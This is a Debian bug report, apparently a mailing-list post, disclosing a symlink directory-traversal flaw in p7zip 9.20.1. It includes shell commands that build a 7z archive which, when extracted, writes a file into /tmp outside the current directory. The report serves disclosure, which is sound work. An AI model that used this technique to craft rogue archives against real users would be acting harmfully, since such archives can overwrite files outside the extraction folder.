Package: p7zip-full
Version: 9.20.1~dfsg.1-4
Tags: security
7z (and 7zr) is susceptible to a directory traversal vulnerability.
While extracting an archive, it will extract symlinks and then follow
them if they are referenced in further entries. This can be exploited by
a rogue archive to write files outside the current directory.
Example:
1) create a sample archive:
ln -s /tmp dir
7z a test.7z dir
rm dir
mkdir dir
echo hello > dir/file
7z a test.7z dir/file
rm -r dir
2) test it:
7z x test.7z
This will create a symlink "dir" in the current directory and a file
"/tmp/file".
This can also be exploited through zip, arj and maybe other archives.
--
Alexander Cherepanov
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
